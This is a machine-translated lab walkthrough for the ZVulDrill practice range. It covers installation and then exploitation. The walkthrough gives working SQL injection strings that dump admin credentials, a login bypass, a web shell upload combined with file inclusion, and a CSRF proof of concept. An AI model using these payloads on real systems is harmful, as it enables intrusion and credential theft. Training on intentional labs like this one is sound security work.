One 、 install

1、 First, download the installation package

Download link ：https://github.com/710leo/ZVulDrill

2、 Download a phpstudy

Download link ：https://www.xp.cn/download.html

Download a suitable version according to your personal needs , The default is to download to d disc
notes ：phpstudy It is very convenient for an integrated environment , Contains apache、mysql Such as the environment , Include pikachu You can use it later phpstudy To build

3、 Unzip the downloaded package to phpstudy We have to www Below directory

4、 Change the file password

Revise it sys Under directory config.php Change the password to root

5、 Import database into

Method 1 ：

Create a zvuldrill Database import data file

Method 2 ：

open 127.0.0.1/phpmyadmin The account and password are root

Choose the corresponding sql Just import the file

6、 Start the service to view the shooting range

visit http://127.0.0.1/ZVulDrill/ perhaps http://localhost/ZVulDrill/ Fine
You can see that the building is successful , Let's learn about the shooting range

Two 、 Shooting range clearance course

1、XSS

When I saw a search box on the interface, my first thought was xss Loophole , The so-called "see the box and insert..." ( After login, the user name must be updated XSS)
sentence ：

2、sql Inject

When you're done xss The interface displayed after the vulnerability reminds me of the previous shooting range sql Inject

When I type in a ’ An error is reported in the back interface

So I suspect it is an explicit error injection based on single quotation marks , Next, determine the number of fields
sentence ：1’ and 1=1 order by 5 --+
When I enter 5 Errors were reported later , So there is 4 A field

Next, view the echo point directly
sentence ：1’ and 1=2 union select 1,2,3,4 --+
2 and 3 All one echo

Check all table names
sentence ：1’ and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
You can see that there are three indications admin,comment,users

Next look at admin All fields of the table
sentence ：1’ and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘admin’ --+
You can see that there are three fields admin_id,admin_name,admin_pass

Next, look at the contents of the fields
sentence ：1’ and 1=2 union select 1,2,group_concat(admin_name,0x7e,admin_pass),4 from admin --+

Seeing such a string of characters, I suspect that md5 The encryption is decrypted by admin

Next we log in , When I use admin,admin Login failed when logging in , I suspected that there might be a background login interface, so I scanned it with a tool and found the background login address and used admin,admin Successfully logged in

3、 File upload vulnerability

Next, just register an account to log in , Click Edit to find that you can upload images

Upload a Trojan horse , Because there is no filter in the upload place ( Of course, you can also upload a sentence to the Trojan horse )

After uploading, it is found that there is no return path. Check the source code to find the path , Of course, you can also capture packets

Direct access 1.php

4、 The file contains a vulnerability

When accessing about I saw the interface about.php?f= A File Inclusion Vulnerability is suspected

Directly include a Trojan horse just uploaded

You can see that success includes

5、 Universal password bypass

Enter the account and password directly ’or ‘1’=1’ --+ You can bypass

6、 Directory traversal vulnerability

Through a directory scan just now, you can see that there are many directories

Visit the corresponding directory to see the corresponding files

7、CSRF Loophole

Make a packet capture at the place where the account password is modified

Generate a csrf have to poc

Direct access after replication

After you put the package, you can go directly to the interface

3、 ... and 、 summary

This shooting range is very suitable for a little white practice like me. If you have any questions about the above steps, you can contact me .
notes ： There's another one in it xss Storage type 、 Permissions span 、 Brute force crack holes , Brute force cracking is directly in burp Can , Permission span I found that no matter what user name and password you use, you can log in, so I didn't try ,xss I can't leave messages on the message board of the storage type , There may be a problem with the source code , understand php The boss can modify it by himself .